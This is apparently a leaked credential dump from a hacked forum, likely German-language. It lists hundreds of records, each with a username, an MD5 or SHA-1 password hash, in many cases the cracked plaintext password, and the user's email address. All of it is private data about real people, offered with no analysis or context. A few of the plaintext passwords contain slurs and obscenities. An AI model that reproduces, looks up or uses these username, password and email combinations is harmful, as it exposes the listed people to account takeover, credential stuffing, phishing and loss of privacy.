+FinnX:01203eb70433505a23d9dbddddaa303e56f6da46::php-dev@jublo.cn +terminatoor:7afb7337248178576169e9346e174bebcbf16df2:adidassler:pedram_417@yahoo.de +dergeldmacher:797e43ba0154cefd156c96477e596813::bananenbrot9@hotmail.com +the_comedian:b8ec05a4a4db954096db54026aae858f::philipp_wolfart@msn.com +devildeath:d9a19c119f5329351a9b438457e5d202::tobias.peterli@googlemail.com +OwN:8fe4b9a4e62ad18b6c9c6475460e9bfb::flirtycool@hotmail.de +woOtz:307e0c6b8469c91b1edf146099789da3::wootz_2k6@hotmail.de +Darkboy:8d0ab8b9ee2e48593046ca85e2acabd4::gamya@gulli.com +Leaf:df984cd26a1546e23506d5ec60befa60::n4pftw@gmx.de +Saitex:5fff9adf1a51caaadf4b7b612cd9691226fd3d07::saitex@gmx.de +hack0r:309e8c873ef3cd4a06086ae287180b165a768b55:123123:timandrefritz@googlemail.com +starliner:1a7620b9845f6b2ce940472a3fc45ce4::wolf20@web.de +Cappo:5ed59311d4ca96814006cf89470c6b3eb0076ba8:123456:cappo@freakmail.de +Shauxx:0ce5fe61f02bac0739794a154922865f8a03d3cc:17061907:konos@gmx.de +Psych:4929c07255b7757e20f5b24c7fe6fc6d::dono1232@gmail.com +AlienCore:963810011b1300eccbd055cc4835670b::HearthC0re@operamail.com +IceCube:2453db66f888f0c2f9a7d5b0e83eece420c5c695:heru12^1:djdmx@t-online.de +Sayajin:cfe629478b2115cb6609337c727d1bd0::pik.sieben@web.de +Imadj:80c6afb124a9e5ec2a0a3543472460df35bc2905:habbo123:imadj@live.de +DopeY:e35ff065d7ee35628625bd0f8b8d6a26::S.me.K@gmx.net +BEKO41:d37ccd97ec1cf182696cb6bee731170d50bcaa13::trk_styler35@hotmail.de +Tsunami:b61914833500d5f55cc6386b3daf0faa::cc-0405@web.de +Smooorn:e2eede5c192340d22b439a67d0622354c760f7fd::Smooorn@k.ro +Tastenjunkie:e6d7a64e1c9d1540ee2e6945a591b4cf::Flory@gmx.com +BlackBrack:af4849212a1ed3396bed461154396386::BlackBrack@mail.3dl.am +trabbie:4c0e0b8517612a9ac2fdc1cc48c683c9d6e2c5d2::mikoklose@hotmail.com +Gollum68:969acce22376e96ea738773142f69e56::ts2k8@gmx.de +X-TREAMe:bbd348d4b1e455e0db3f8fb6071ee945::x-22treame@hushmail.com +VENOgG:22273fa04f3c3cb5c1b8ccb37d9fe3e0::headzots1@web.de +Braincerz:086e25802ff9a7be9013d9b44250a06c199895b6:horst123:Braincerz@yahoo.com +AToMKRaFT:6224f817bf78d1423d626b156a188892fad77a32:theswan108:dennis909012@hotmail.com +DavinChi:950a66902322b4dffcd528ff6e2ab5111e1b8014:kclubfan02:rogowski74@arcor.de +IceMan91:15de5a507cfaea8f393011f2f28e66870615b680::geilboy91@web.de +ProC:64271e8487ff7a1c7861df901be3db92::proclamer42@hotmail.com +junge:7c13e211aea8651050fbfad3b221c498::achile82@hotmail.it +ShadowNight:19d7d78d2edbe14189f6a4734e43da7d::stapsqrqw@web.de +ayan0r:e0687cb51ee8897468cbad04affe4e3033ab3dfb:81ebkk:paidshit@online.de +Linux07:2014090266d988f064a942bc76d705d5::Linux07@gmx.net +MistaMicha:0cccfb42adb9e4e329b241f918361b293db860b6::satan.girl@hotmail.de +Kay17:9a3f7069744f042925655a409e935a2f9206bfc9:Edogawa:rocxtar@live.de +Mythos:becaecad78538bf67b02c5d953bc8717::mythos94@gmx.de +ceuiz:7a65929a70e5be390aa9c4fcb572aa74726388ee::snaky90@freenet.de +iSniipeZz:fdcf01ac4fb37d311b06ace81503f62b8fc5b17b:sido11:BlackSniper-Alex@hotmail.de +freelancer:ba254a3dbe808be30c2965cdd3868573::bs_1_2_3@yahoo.de +vw 411:4a9fab1d5cd96fb0fe13654b2452ae350b988537:112233:phi.l@hotmail.de +Xeber:266d409e97ee50eb2607d013bdc33f0f::eolfire@yahoo.de +skull-man:929282773bf84dc7127454e4d8033d56c0055c91::makellos@kuh.mu +S1N1StEr:047bbdce2b707d402f58ed9c1ca3de09::smesicht@yahoo.de +Ketchup:c379dc1545fa630f1f501a50fc9a0a7548cd759e::ghddd@gmx.de +Dacher:45c9e2c5904601c77bd3253534f3f4169077c3a6:fler12345:duchi21@hotmail.de +FoxXx:a7e972bf1de6ab6c0604e554c2fc3e1f::Pascal.Lantzsch@ooglemail.com +typed:1276a8fb6b4f244ed1b503fb2a7cd9f3adcd4fa5:blabla2k:dropkid123@web.de +Deformer:49e4a80653660cabd5ed60d7f85fb961cde2ea44::kaliumfos@googlemail.com +jahq:00560bd179c3a7fd1a488c252e1a873f::don.jon80@yahoo.co.uk +Aramis:0ec7af731e578405d133c657074a7849::thomaseroglu@hotmail.com +Peacemaker_bin:48e48f7adcd843ec3f48e795fe373817::corkra@gmail.com +ThriLLer:8064f39f45403b7f55e34ec18a2af8d3::manuel_wojta@yahoo.de +spiterr:90f75aa78094b2f687ef8110581886af::spiterrr@web.de +hefalump:a8c45ffeda62594f0bbf0014548c26d7::hefadefe@trash-mail.com +Bischi:b8ba992b8cf0855fbdd2a570b79fee14::franzelchen@gmx.net +Fr34k:d6cbab53ef012e95617617fa7709f1f088dfa3fa::fr34k@bk.ru +pasikor:3c97ffc98c6880373b80258289aa4525::pasikor@gmail.com +serokapo:fc06662845238b7dcaadf2e08d1fda73ac739c57:achmed:ryan.bannister@hotmail.co.uk +Russe89:a85f2dca073b06c5876a15385e8c1def67c8bed9:arschloch:russen_mafia89@hotmail.de +Sianzo:de5fe7194e3412053f0c4f047de93e2675e180b9::blickfeld@t-online.de +cidow:cbea998321f9df8d3feb963bff6aad38::wnbbb@web.de +tr1cky:03761752d48b233eb8261655bcbdbc89::tr1cky@live.de +sedriss:0ee40cb3c916edb6e0780dbf8146b2e230653dd3:bennie24:sedriss99@yahoo.de +only-fresh:c467058cc01887043e46f3182e526c71::stitsch80@web.de +jackl:90d2dc1f3d536dfd146b3223224c11e2827fa6a9:marine:jackl1304@gmx.de +aim9r:3de1ce3eeffe999f26dc4e91dde539ba5c61ecdb:nigger123:lukasr1337@googlemail.com +kodex.eXe:4697f46b117d01ead416d5c45abc438f::peerzet@web.de +N3xt:16d67f287b64d035b5c64b53c1c0cf36::next@secure-mail.biz +remix4u:7c28a9126740191bf7502fa9644903f3::mezzomix11984@web.de +Grax:99f2b41bf02a7947fecf970294d5bc74::grax@e-mail.tl +#acy:548c94bb61daed8403bee3144af9690d::soulstoned@mail.3dl.am +d.i.p.r.i.p.:9fce3e8567d4794fd60b132d99c4bf3d86ff1b90:ficken:fraghunter@hotmail.com +Terrible:f304fb19693f9f6039ee30f11f7b9a0af73d31cb::WodkaL1ver@yahoo.com +HijackThis:e02d588ea8b71d267255f98696ddedc48bc23343::ikilledyawhatnow@yahoo.de +noname123:8ab55f2509b66d8edb68b2dc8ef119825d5b3d71:fickdichalta:waluri@mail.ru +Pasch3r:a72f4a76860f7575bd39b6d18479990d::xpaschax@hushmail.com +heroin:230ca997f20b304f769bd82e3c121503::heroin5@web.de +CryingAngel224:0c8b7e28de79375905eb874da752570d::Hard-Gaming@gmx.de +zim:9204738f30ee4e9fbe583995a9ad6f0d::pkimes65@gmail.com +DonTronDK:4ea4e00359bc23fae51de95eeec1a2e5ed4b7cdc::dontrondk@gmx.de +capt.ddos:f6f9d66d6de8c6ef4b2c3a7ca89c90c7::captdos@weeb.de +fire_ger:777dea1cd721f94bbf510c5097dad91b::fire_ger@gmx.net +someone13:5fccfb489817e2f262a608f90a6535892795b25d::someone13@e-mail.tl +Capone2009:12d75be3d2e3e361a9d517d375ce3298::doku-blog80@gmx.de +astfdk:62b05f1eea704f7d05fadec0722419d3::astfdk@gmail.com +Bobbysiiiiiick:2f4d66824d29aab6937006c686f920bf6a0f8f9e::Simon.Kowallik@yahoo.de +WhiteFire:721d58430c9367419b8f17283378768a::anus_kricher@web.de +Splinter:aae5b463be18e4dc6f5feaf222bc118f::hsv@hsv.de +DaVe ^_^:218aad12a23f79fda03f05c414a15a4d2af15cc3::wayne.aka.dave@mail.ru +npu:85f18beba57c3f482f8c2f3fb4471988::npu@quantentunnel.de +InfectedXES:f32644e4d503416a7cf859520781ff522415340c::lab3110@gmx.de +johnnymotor:3205ecb222b80b217ade1680562c01ba3f48925a::liguan187@web.de +ch0sen:db0deca35b972aa06c28851d8df9cc4ec7529aa7::13ch0sen37@gmail.com +lolthefreak:94357ce83ca60331185869b7f13f2cbd::chris.belart@yahoo.de +Pasion:05ca8d67621a34fd8abd47f46e2a164a::pasion@fake.de +niceOne:c73a1455985d25fa74cd7e4680196a86736416a7::marcothekking@hotmail.de +Kolera:fbd5deac4d05fe481a6474fd9590a4d1e44d91ff::emin_5592@hotmail.de +Prime:c16b521ca9bb5ae134dbf3544ed6ce1b284ccd2b:bluethunder:brueckna@hotmail.de +Moto:3f32fc5ad689b129253986a71ddc8e37::Motoracer@gmx.net +Drecksackblase:36161d2e01ad4735d995ec47f9bb9cd9::congostinkt@web.de +T-Slide:d7830094280de746991eb7c37e42159b::tslide@idoo.com +rK.#:8b3b7a4f4ab4ec4f5ad8beebf5fc1bff::Max.s17@hotmail.de +dq:d3b8e1bd7722c315502fc04c1487c3a7::dq2812@gmx.de +trokiano:2056ea0dceae435ac279ac0ee9cf97087acedf23::crewbuxxer@gmail.com +memolidogan:5ffdaffd3d2b7a96f163819493c35c0a::memolidogan@gmail.com +Highfish:4cceace64c5b35605fb1c3689df0d67c::Steven_Schlicht2@yahoo.de +landsbaer:6a11e01c9bf215d0abd053ba99f7a86965773488:28469:whippedass1@googlemail.com +glow_316:15dc3d6bfdae58898f4b9f6d659982e5c21ba51b::glow_316@web.de +fR3aKy:280e649b4a5733c50219d73784bddd41::jamieis@hotmail.de +thxy:ea7f31788aeee032528c68625cf19313979c5080::fhxgod1@web.de +ThreexCP:d46284688a49e0b952a26329ec8ea5151b1e0a08:jeltai:3xcp@live.ru +Sh0cK:4c57df255010aac108999d150fab6be8601e7f87::greece69@web.de +marcinator:b3b6b59f061109aa4164341f9af809cbef3d45a1:chrisi:marcinatore@gmx.de +Spyterm:fc036e361047614d8baf938b960aebd0ad1c4f5b::Spyterm@spambog.com +Breez:fb3c94c4c2064832cdae02ec4b39f603::br33z@bk.ru +Junky:c4fed157df0c7a42df073620b9cdfbff::HaRdCoRe_2oo9@gmx.de +pr43v4l3nt:7917f3cac15e43b240ce8b28863bdd9df0a4c707::roflvsxd@z1p.biz +freaky3:d50ab0c2ec0fae38219db599ab612a200121a665::a2259888@uggsrock.com +Striker:7ddcf14feeacf3392fc86f17cd3c3c46450fbb01:Sword-Master666:demuhse@hush.ai +r3d1s:5173a7190e5b10b3b8253db5d80472eb::deskjet@auto.lt +neocromicon:93834b6b280fd6c5044da50beeb932ddbd675916:magswell:game-modder@hotmail.de +DebitCarder:90ec7b2bc0c1e97dfbb2f2b9aaf2c503::bjkdewjhb@yahoo.com +donmichele:3fe3c1f9b049d7c852cc29ab7d8a9537::donmichele83@yahoo.com +FroschKanone:cde26183d66ae23ddd5fb48943b7560604954ad4::crudelix@arcor.de +bozz:e3877c00c6f5d83a378f064f43aa035c2abe0b90:aylin22:adohengst@hotmail.de +zyan:5d055c065bf1db2f9caefab2720956c4::vekken@live.de +optiker:c486635ec855a92854ddda29cf454630::a2710616@owlpic.com +ecize:61948b0f3c7b53821ab3804fa747c107::ecizes@googlemail.com +m0nst3r:d6e3eba15c8efd705e161bc40a83976c::hannes.waidelich@rs-iw.com +ghost788:598762d4dae28cc84c7453bbbd46756c4bc9b097::ghost788@web.de +Kotek:b2cac32824a90a1f3a51cf66c52292ebe4fe2c88::sebi129@web.de +aYa:9331db971a9f669d1b7a25257ffe7cf36cfbff9c:789456123:martin.kaminski@web.de +KING_TURKEY:6fc6333da97c6f972dba61df95e11b7e18c05b49::king_turkey@mail.3dl.am +Sewolfian:5d357ccc45210bb8c206212b0b741295a6eb4ea5::lunpa@gmx.de +chriskhoatu:e2621fcda3b4a5fd8c1afa941d07ec3e50f58947::chrisplay@gulli.com +kIrBy:b866ca100ec92da8729ff0aac17e12fafceb13ce:eclipseeclipse:kIrBy@mail.3dl.am +XuXuX:676e6f496dfe43a27dc4b15c2abcaf8e9e90ed68:USAUSAUSA:asdfgh123@film-blog.biz +wowmeacc:13529af15137df4c5b2d479ace0427245ea44f80:chbaab12:wowmeacc@googlemail.com +aSi:819483fa7a5e43702b74bd948278d0d6::carders@spambog.com +mrflava:2c8be953cb83494c0ca9d839d9a26e4e::mrflava@web.de +Datenbankcrahs:04ce3df0d7a63f207a8ca704748f140e::l4y2009@googlemail.com +S3RB31:acbadf02e45b2853526fb46af52138442e103a4e::nasen_mann@gmx.de +smreon:c71d8dbfbc64fddb9e6ee2d9800b37a6d4511fb9::niermi@web.de +eL!t3:4198d843988afafcf455bd4f435ed652::h4ckz@e-mail.tl +CokkeZero:021ab9bdbfbac3db535272827ba15db1364747fb:pakka:sirobuehlmann@hotmail.com +l0tech:11023fadbb54e693b5a4a26435de5a95::dday@mail-on.us +Jack:8e7d99c1231af4a0eebd1f003802d8c3e22155fd::cervantiso@googlemail.com +ReduX:97571b4e0ecc2fd1b8823e4f2d44e68664839cb3::redux69@freenet.de +Jonko:96f2352d316aab4b76c0562e50a0e5095c8d378a:70607060:cpufreezer@web.de +Jok3:2704194b27a226de6ab33fa35c5cc2e3::jojo5000@icqmail.com +fuN^:67fc08e6483276345b29ed4e38e7bb00::fun-delta@web.de +Mr.Serious:10b939213dbfff90afb106b2120c6ae2::Mr.Serious@mail.3dl.am +Escape:f8fb693c9c18b61cca208fe80fc5ed70::edipjanic@hotmail.de +Inphy:7fb68f8354bb8d74a2a5214c17b10438::inphy@mail.3dl.am +jey:b1609282cb43bbbe42070f0be685d592::loadimage@web.de +Echoplex:c9c3c260cc7b3869bc7555ad67b72459::sfsdfsvafdoehdwlsztcuogvl@rcpt.at +MeMp:83b232c054a127dd8edaead1f9e02f5f7ba1837a::memp@hotmail.de +Redox:863c50783f03ec1246cc99d8f41fd0b5b71c5821:711681:email240594@20minutemail.com +stormy:9db61478aa1f687ad47287d91879b5ec8fe456ef:fickenficken:gigiigi4423@gmx.info +TamCore:78de5d91517300f593b797c9fb6c7620dd2df88f::kleinadolf@mail.ru +xenor:0bd23eb534a3e6b35af89e9ad5bc73d7::openblume@googlemail.com +TriggerTravis:61dceb72a62243f34162f9c758b58fb8aa9965fa::TriggerTravis@web.de +SonY:b030a7856a9bb3f9fd1623c4267eec8d::seckbach1@web.de +JohnDoe:3ba8697bc5f8d7488c6a224a73a3afae65022779::bierbrauer1989@gmx.de +RedRabe:fe57b77e42bc7084abd6c43d03ef406d::rene_on_fire@t-online.de +Taranis:972d950e1f1fc28a897491e69986ebbc::Taranis@mail.3dl.am +GOD:a2edf76338fbe22673d10a3e7e0f042b2f3aaf13:wurst123:badboy87690@yahoo.de +Pizzajunge:0efb774371e83113a450d99c9944fce78883f847::Pizzajunge@mail.3dl.am +YukaKing:f2e29f2b680c6c1a7a021a570ff5bc62::xXtheluiXx@googlemail.com +chapter81:96e66a7d70ac62eabc58193f1a18a588a010f536::chapter81@hushmail.com +flasce:82e10838e6c96c4c64613aedaa549041::paul.schroed@googlemail.de +symbol:598ca48d964d443b49a26ace7ad9c7ac::krissy20@hotmail.de +Manu:f66f375b52435e65a2ea4e7ef2e0c4fd528d99db::manu.maechler@hotmail.com +Hannez:564508e1bec51f68a8fc2869a2855ecd::spam@ivacymail.com +iandean551:f3467261109616ca0edaceda3f1b05a0::ian-scheafer@hotmail.com +UnZ:8586f7e12bb97225083adea2bb94b800e5821b2b:13371337:unz@warez.tc +JayJay:709c9540dcef6a385bf1a2d84d480b1b::jan52551356@gmx.net +DMTH:0400a14728747c3cc829b3a3e47e707e674b6bdb::klogger@spaml.de +Crazyl00p:08df71c3a29855eb5d721620cde64f3c::crazyl00p-h4ck@web.de +termmi:9c1bb6667b16e83766a6d3289a7d7062::nino.frommherz@gmx.de +Ch0PPeR:f1c1ec4bcc168cbde187ef8e7af33c14::goofy1001@hotmail.de +krause515:8e6c6647077510f8676cf68997c2a1665fd93124:jennifer:krause515@gmx.de +turb0julz:ec17fef51c7b1425efbb96facfd815621f9fe579::julmo@gmx.de +Firehacker:8aab7de718e3cb84e3143cbd36ba68e2477bed7d::knuddeflo@web.de +milschbubie:9d271495473153244059a61c6e681a9b48ef8d2c:beckham123:milschbubie@secure-mail.biz +Poinger:a5589445a8af870f78667dcbdc08b2f6d2be1522:gold2news:info@gfx4you.com +pak:27debfb318061158effb64eba13754f0::andrzejwug@live.de +ragal:330cb1c37e5b026b33ee14f0dd47f25359d88ff1:bagal:baldum@web.de +sk1sm:7060637f1a50311875e45a9b042f8007::christiansindel@gmx.de +daniel_watson:278a2ed4f807d6824c33ed65afc87cd6::daniel_watson@gmx.net +burningdiary:cc49888d1194eda344d3e584a8958e176c356b56:abcdefg1:ikilledbambi@live.de +GL72:4c0ab5edddbbbe3842e786a12339b53e::godlike72@mail.3dl.am +chris29:a30cdc1442cd8205c3db9b91758127e29e22f12b:chrigel:chris_aebi@hotmail.com +D4rkStyle:ca44878bca7df0798944ae10db109635::eiermann_der_mit_den_eiern@live.de +t0b1:5e5af0ef8d5b8c9c35d2ca2474025b13fb0d44ae:lactose12:t0b.1@trash-mail.com +B4S1C:f1d4e68d3da3297ff0f63d2d33c7400a::computerkenner@kuh.mu +TAPS:28288650aba1a454c22a45361b786153::dockarbeiter@web.de +vcrax:5d1ef1d82728dac08edf963b57309de8::vcrax@yahoo.de +r3druM.:66b10bd6dcedeb4f3c92f7ffd353e57ed21d406e::deakone@hotmail.de +Packstation:829864e119111d856b8b9d507d56cfde::heinrichd132@web.de +AEKA:fce36fba6b35fbff98eeb59c330cbfd6::Funnman@gmx.com +thes1lence:ae9aad5a3f802a2b74f4ddd0943c1381cfb36fc6:hallo123:kakaendde@gmail.com +Gr1nch:7ba2f4236dd795bd5e442ee2a14990b6::lubbold@gmx.de +Hellfire2k:7c00a261365bfc7e60663d6206db3bdaec46a40f::ptr.genz@googlemail.com +n0va:bcf7377e383c4d2ecbbbc18f5cab0242f81d16b7:bruteforce:jannik@secure-mail.biz +JBJBJB:a17e8a1e8ae7041e534e03f249f53e6c::sa@funli.de +0ptik:a1edba63cb9d1c90fbf70bb926366cabfd903e0f:source:rulez1990@web.de +DJdALI0:b7dbfd263f245fe3ebefe7af752fbfe3::peter-luchs@live.de +stoli:bf6bdc553f41fc1edb36ad504cd6d18635c064c8:5040302010:stolichnaya@hush.com +Jibbertripo:94de27abac2429fa197a845a4a359296ee391b92:crusher91:supermars@gulli.com +k1337oris:0ab669f8f5235dae8f4818507df7f53a::torsten_007@hotmail.com +i6eaL:892ebcc9b6ac3ffb81fd0e5f9f099005::donideal@spambog.com +hanswurst:e9fff655e2afac42d691bad5dba16126::122112jam@hush.com +swizzer:5f94353b9d946940a363468d717f884d::oberle_j@hotmail.com +p3ng3l:b10196f677e35ae76fc63d947aa0acf6::p3ng3l@hotmail.com +Snipes:ea20c81ac16051f6638b405f60469d01f4a0346b::noreply@mail.3dl.am +h04x:72aaa62a651ef422dbbe020d310451c1cac19548:1969:Zodiak@mail.3dl.am +bleistift:a7dd29cf84ff23b2f7c7c996f378c572::realgee@arcor.de +Fire-Hood:d64d91403739517c0e45c2e5615c32f3::coder_hh@hotmail.de +tibar:83c8fc97e31c1832f778a7c8bd2801a6::kalhofer12@hotmail.de +Evangelium:fd2c82b61af97c22fbc4f994a492269f::a2277240@uggsrock.com +haribo:7b2b4046b712135742362362b6854ede::naberlan@hotmail.de +dr.fuchs:c55782de00191b45a5924a73a95b2a07::drfuchs6776@hotmail.de +ibeat:1c1b515cb888652e940bb1c2d6ec8eec4c5efb35::tempoaddy@googlemail.com +STEAMUSER:4f60238277502b712d1e603d1aae8340::oliverr@safe-mail.net +amayenor:995d85b6cdfd3a42e97e8f65f089b3b0::amayenor@web.de +Pokey01:2c1afa8bf22246d08be485bb9716cd93::kevin_hochstaetter@hotmail.com +scofieldog:fafcd7df9615cde0195b0e6a776dd106::noob28@kuh.mu +ConsistenX:10d73a661597abab47f911d27c78bb8f::consistenX@hotmail.com +dragon2k9:d4d3ba60566c58cb70a154198634dc9f::illuminati_clan@hotmail.com +CarDerMant:401d610a387eb6ddb1095b011c438918::buba36@gmx.de +deep_nap:a996fa42651d072e4a06037349043df88a77fe6b::deepest_nap@yahoo.de +Snify:05ce0eba6bf535f0eb4d75a963827405::snify@gulli.com +Suicide:d5ae92bd7037aa568ebd8ea986eb7648::suicide_92@hotmail.de +Delaja:fc48f44280f0122c9064c405127f85b4e2cd6461:wasser123:DelajaCrew@web.de +moislo:8f944a97583e71790894f553b5ba618c::Alexander0023@googlemail.com +mesogirippa:2989471cd348772470bd6e4506abf575::a.ban@live.de +Darknorant:feb1086e411f05140c90cc3307dda984f02ce864:qwertz123456:M8R-okveln@mailinator.com +Ryn:8fae6c7c01919345e91f62085ab82acc0660bb46:goldfire760:Tiniman2000@yahoo.de +Thunderdome:3f0099e47bfa6f3a87ab1d8e4b586cfa::thunderdome@hosting4free.at +katze4711:a5696ab99f78e924d9d43cdf118329bd731a879a::katze4711@yahoo.de +Enri:b13e31a534cb5e3d04202058d4833598::enri@scene-sector.info +d-signed:2e15bf5ad3866c1b973b4cbffbe0ba5e57ca719b:eduard:eduard.mayer@mail.com +FTP187:669c39bccebb5120bf23abb3294aa95f5ef09a8b:money19:killah219@hotmail.de +ottoman92:b7d5665745da8ca8d4e90437b659be60::ottoman92@hotmail.de +Anonym_:998b8bb875b2cfb2ccdb6481cd0af9cd::aanonymm170@googlemail.com +I-15:a9219edd5cb77b47b23cea590ca25ddce8b815ff:qwe123:ZuPLpYf5q@web.de +Xelalex:08a9f40dd325768c8e21b577e58e2b7e::alexander-2612@hotmail.de +TK:0NE:ac14ab:8f148e384080bad1da7042ae74834d40faec897e +Seven2x:8ac44208838bcc980848a513e6e81c9b2984145b::Seven2x@live.de +Za:09831da0951bf55d4fc8217c91615b7bea87e851:Nadia2312:Sascha2312@msn.com +dmzhellgate:0956b6c7dbf8691c21bbc6f32c52fe84::dmzhellgate@gmail.com +pukker:a31532444a201115c0c9cb4632ee94af1fe4e089:100200300:pukker87@web.de +theex:082aeef007ea6987b6258344c68964a950f724b5::gmshadox@live.de +failONE:5e3cd27141e1a7d03dd766d9a7b1fe52::klust.one@web.de +PsychoXx:6c556817dd65932a2bc0eae476999936e5d71842::razordesigns@hotmail.de +Robat:296651aa867a02f28e8f84b4224f4107::robert.kleve@freenet.de +Pimmeludo:888239a97e0150766701f002db2b64e8::a2289255@uggsrock.com +Blue:6d588af22a6f1d2a05f841dc179b5cc9::blue18@gmx.net +Rain:2b7cb5e8561e304aa4485057ecc562aa::freshstyler2004@gmail.com +Int3rcore:05812fa3de17fa972658dd6212628663::chrisx1982@hotmail.com +Russenwolf:33e7fa06bdecbbf9ccda7984b8f8e2f9::martini4u@web.de +slaky:8a65d161b6a32bb6a7aefaf4f6c635e21b07c438:verifyme:sebone2000@web.de +rEEx:9fdf85e3bf702f986be792d0e378a2e6::luQftw@hotmail.de +MisterK:cd3fb216325919dd73d809997eb2a179::misterk@hushmail.me +Blackpit:b40a1b3a50432e2270d4b93ea267ecff59846049:moosach50:gino_bln@hotmail.de +bam138:5f1f184803116f95067bc6e07b323555f47d0ed0::gianni02@hotmail.de +zocker:280046b4a80351d6134ca8900248219025c7df27::mirko.kn@googlemail.com +hacktainer:0ccce627a297a59d6b6e842f205212c2ba557f1a:0515298286:dj_emo@live.de +adam12:2921af4de8bfbc71d0d1c72067abbbfe::adad1212@web.de +dammed_Dammer:cbcfd6f071dc77ef9cd6979c7b97f1ae7e57650c:666666:uhasbeenhacked@arcor.de +indianer161:34b037125e8d7d8d7df13b584a34e804e798d4d4:25122004:chris16161@gmx.de +BiGBiLL:109cee34c1c3246cbead55e13914b32c57174761::milukat@bk.ru +DeXTorix:710e1df6b2c1ad0a6a7896f8daddbce8::Ken.One@hotmail.de +Geekers:799cb0a247b2d6a9008fffa8a300a1ce::curuba1337Y@web.de +Pcfreak7890:ba1fb567b702eb86b0f663cd2930a333::pcfreak7890@yahoo.de +bracko:d3393522db9dad89db461769776016aa::ghalloboon@web.de +angelstorm:ee12726f2d55a463206af222396c08dfcd49f23c:12345678:peter@privy-mail.de +vedroboy:d3961c97067c840c0c7dae500beb5e4c::vedroboy@yahoo.de +ein:5e0c6ae45a52af4536e91a98cbbd0aa3::george345@rocketmail.com +swsbk:01b64bc5d6e08490e02eee8367a469e6a3eba83b:987654321:swsbk2@web.de +Primetime90:6f55a7d0dfb23512857a6608a12a2018::badboy63477@hotmail.com +Popel:cead6a2eb00d15fccc08547552f365fc::hanneskarl@live.de +muthabuzza:00f7a523769b8f87f2dd87a2e306d04b::friedhofchiller91@hotmail.de +berlinaaa:74ed3ff86d643b2bc677a98967f7dd5f::berlinaaaa@web.de +OmegaApex:cecff31fbee6f272438789b68b6d07af::sp33dr4c3r@hotmail.de +CreAtiive.:7a8a0158b33499bdb468506480469625::cooliboy@live.de +P5N:07f9090661f3442fe63a72eebc441cee523f5479:yxc123asd456:AlexanderBergmann84@gmx.de +C3PO:351fb819a0bcff6676775d1321ca422f::baumsf@gmx.net +neferkamin:3c7db358900bee635e7e8319b26a0e6e24dbb43b::neferkamin@gmx.de +RaveN^:d810ab07404c10722e45a9650fb52707::raven@vigilant-resolve.com +Fresh-kanak:4200eb8853a8fbb9ca9467c5ac3b7dde::Kakashiii1@gmx.de +Arman:8974efa5a5dd4b8dfda6a7fc698925b0::lehmann.crivitz@freenet.de +ai:54e5b0fda1376f0b388f0243de742bff514cde42:pass1234:adedaramola1997@yahoo.com +benni16:008923abcbd38bc0410374d0a9baba85::aquitas@discardmail.de +egoist:444e083e3e29aa1dd00403fe1c04c13d::egoist@trash-mail.com +Six_By_Seven:9e9f344aae3ce786568e0bef3b702eb4585ea326::six_by_seven@mail.ru +Stonedgimp:a63bc70088185795d67fda8ee10b68f6fac43c5c:stoned123:stonedgimp@live.de +numo:d5dd388781f646458fd4555ee02a7203::jackpot_umut@hotmail.de +KTV:45ea8c40e98f0f233089ec8a1befcac3::acczneverdies@googlemail.com +Ra1n:0bacf23756c98233a0c9ba26d9356170f959a151:12031996:ra1n@live.de +HaPix:c0d814cf3017e1dbd115ed127d4fcf44::gati95@hotmail.de +energieee:9c53c5bb6c1ba6d9f3e8e10c367b8f0c5d86709c::edgeee@live.de +Der Don:65b0c8193e1361548b37c1df7f23adffb89e6032:steffi:phousesu@trash.srb-board.de +leet4speed:d8145ae4f1f02effcd9ebfeec456ff3e::Spickardt.Barbara.mSBNsNxu@web.de +yavsak:24da7231b0bf73fe0c21459946851291b2ee805b::yavak1337@yahoo.de +She:a0839dbd6a933d4513ec5cd78a544547::manituzzz4251@web.de +ccworld1:dd357b796b49f5093dd44d8f623e7765a58f6aea:mankind1:ccworld1@gmail.com +San:c7aa01805d5656e2049eb75577d57215::sanjos-michael414@hotmail.com +HuHu:5423b545e92edc6306fa6e7ee8e2fe95::madidoro@hushmail.com +TomDanger:aefc12c31befec49227b7b47050be2c592f34e87:gogogogogo:tomdanger@safe-mail.net +Holzkopf:4e18948beae22a026443c6e79b0904a9::holzkopf1337@yahoo.de +Lexy321:21674be63c570f67d1d02a28be18dc21::123flex@arcor.de +Raditschi:7224f36bc13c7771e52133f457260d84::raditschi@googlemail.com +gigu:e03fb32408d66d4a709b20dcc9f2878ccb46b1d4::spica-@gmx.net +thibo:dd2c61e452926db85c6f671a68f7e9cb::thibo1990@web.de +Cobray:82ea227dfa78eb73ae4da7ca309b46218119064a:natascha2:Cobray111@web.de +affenprinz:a278645a16d62dba8f4166b73e48d44d::festl_gazo_1030@hotmail.de +NEA:c5d937140a5e52779a8d21cb27f248ea::peacemaker2@hotmail.de +alOne-:30b191d3a7095176a5184048611272c0326fccb1::styl9rg@web.de +Kaev:0107fd33d0cf82627c3df075f963f60d::Demonhunter@hotmail.de +Drop:7afc5095f011bc028139cb173df659a6::garnixan@hushmail.com +Mittschi:cff065a9c2eeab1f67a0dff73dbd325f::sdfhhg@web.de +Tertius:f6416220557169e28c54baa41303f100c24c24de:command:tertius@secure-mail.biz +darkc0der:a5ecae753b068cf1f25b95665ad04f8f::cyberatack@w.cn +PanCake:012da931f6858fe9674a59a8df1ff5a8::riejfwhweu@trash-mail.com +B4N3:7f86c1eef7405ae56a601da76dd3204f::ShadowsZorn@web.de +pipahONE:10b7ced4bfcb414d724e5f1cc22b92ea::samueldick2000@yahoo.de +thug1:7d18f51f644aeebb5a83d9c5448c9287::email217@web.de +Boglu55:8c76cd21b4574b56f4cc1acf26dff6629d79e765::Boglu55@rocketmail.com +Rumpelstilzche:d26f93486e451a6a5e68e26d202071d4::bananenbrot2@hotmail.com +sensokami:d348783850c47d2bbb3566f6341e6f4e99b62502:buschido:sensokami@hotmail.de +Icy:b5992c1191123b7665cd32224d5153fb2d165897::fnatic92@gmx.de +Goldenstyle:bf30e9353484d1d54fbc6235904ec2b1ea777ebe:hanspeter123:sulake@gmx.de +paranoidus:85f9b29d78cac44fa3467bb326f396f5::paranoidus@chemist.com +PuresGift:d018c3b40248fabca8e68cf7a439eb29::rs.enzo@gmx.de +Xclusive:5aec2966e2af8013cbdc838e759c23e5e42060ec:5388738:bgvslxbgvslx@yahoo.com +levision:9be35efd44f442a91cc0085af0d964aecb1b7ff9:fenster12:oconner2008@yahoo.de +OSMANLI:4674f3113b3f2a94b21738934565a637::xxslevinxx@web.de +Sector9:efd2f479402a18396372af79acea5ade::sector98@hushmail.com +East:39b3acca50622feb8cedc9dec81b667d::shadow.css@web.de 